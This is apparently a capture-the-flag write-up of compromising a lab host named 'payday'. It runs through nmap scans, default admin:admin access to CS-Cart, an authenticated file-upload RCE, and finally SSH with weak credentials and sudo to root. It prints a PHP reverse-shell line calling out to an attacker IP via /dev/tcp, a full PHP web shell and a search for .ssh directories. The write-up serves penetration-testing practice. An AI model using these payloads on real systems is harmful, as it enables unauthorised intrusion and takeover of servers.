TCP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 08:40 +08
Nmap scan report for 192.168.113.39
Host is up (0.039s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds

TCP Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 08:41 +08
Nmap scan report for 192.168.113.39
Host is up (0.040s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_pop3-capabilities: UIDL PIPELINING STLS TOP SASL RESP-CODES CAPA
|_ssl-date: 2024-11-23T00:41:58+00:00; +6s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
|_ssl-date: 2024-11-23T00:41:59+00:00; +7s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_imap-capabilities: SORT OK THREAD=REFERENCES CHILDREN completed SASL-IR IMAP4rev1 UNSELECT STARTTLS LOGINDISABLEDA0001 NAMESPACE LOGIN-REFERRALS IDLE MULTIAPPEND Capability LITERAL+
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imaps?
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_ssl-date: 2024-11-23T00:41:58+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3s?
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_ssl-date: 2024-11-23T00:41:59+00:00; +7s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2024-11-22T19:41:50-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 50m07s, deviation: 2h02m30s, median: 6s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.15 seconds

Port 80

Port 80 is running an e-commerce software, CS-Cart. http://192.168.113.39/index.php

Register Account

Error And Success

I received some error upon registration but the account was created.

Admin Panel

I was reading the documentation and found the default Admin Panel URL.

http://192.168.113.39/admin.php Fortunately, the Admin Panel URL was not changed.

My first guess of credentials turned out to be correct. admin:admin

Version

I found the version of the software in one of the links.

Exploit

I found an authenticated RCE exploit for CS-Cart meant for version 1.3.3: https://www.exploit-db.com/exploits/48891

I couldn’t find the file manager mentioned in the exploit. Some searching on Google gave me a github page that explains: https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

I then followed the instructions and uploaded shell.phtml.

Error

After uploading shell.phtml, I navigated to it but it looks like there’s an issue with my reverse shell. I also tried other ports to no avail.

Troubleshoot

I tested to see if basic PHP execution works and the whoami command works.

<?php system('whoami');?>

Reverse Shell

I then tried executing a command to get a reverse shell but it didn’t work.

<?php system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.45.164/8888 0>&1"');?>

Enumeration via PHP Execution

I found user patrick

I can probably cat the local.txt but I want a way in.

I couldn’t find a .ssh directory in user patrick so I tried searching the whole system.

<?php system('find / -type d -iname ".ssh" 2>/dev/null');?>

Unfortunately, only root has SSH and I probably won’t have access to /root.

/root

But oh wait, I do have read access to root as well as .ssh.

authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzx6C2kxbb2qPx9eRyW072CYpMhpa2zAlzgdBcElRS49cvTJlDcjqvC8DlpZL9FplzcfpCmD2xisb0VdHUtG2iteYQG5WaxUEeHd4t9XRqA9zCU3QjKq4jIDoT1A54HYLoEBk/jTxjUbaczfoFSgcZEOivBIZEM6usJW4gDgbpok1UoxHfmn7rRs43rgBKxKMpFZyp0+MsDlvKMZUie6F0mY60E2YSlwoyLAJKi0q1/oWB5Kmd3YtP20LIsVqvmbX7zcMXwXgztff0Wxj1dps0x6i1StYx1l14sU84comlceyZjzeYpqMoL+4OtWt4goqTqpiQasnXfv2vhNvCQXQaQ== root@explorer

Unfortunately, it only has an authorized_keys file and no private key for me to use. Seems like a dead end and I’m falling into a rabbit hole.

LFI exploit

Looking at the cs-cart exploit Google search results again, I found another exploit for the same version. https://www.exploit-db.com/exploits/48890

But this is as good as me performing the RCE exploit, if not worse.

Revisit RCE

I revisited the RCE exploit earlier and tried uploading a PHP web shell and it gives me better output.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

However, this is really just a more user-friendly way of seeing the outputs of commands executed and the way in was still nowhere to be seen.

SSH

Nothing works but SSH with patrick:patrick works so everything else seems like a rabbit hole right now.

sudo -l shows that patrick can run ANY command as ANY user. A trivial sudo su did the trick.

sshpass -p 'patrick' ssh [email protected]

Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
patrick@payday:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:
User patrick may run the following commands on this host:
    (ALL) ALL
patrick@payday:~$ sudo su
root@payday:/home/patrick# id
uid=0(root) gid=0(root) groups=0(root)
root@payday:/home/patrick# cat local.txt
f4931662e8e0f3d1878d838311218b2f
root@payday:/home/patrick# cat /root/proof.txt
2f434ac0f7a810be6d8dac5a5042cc51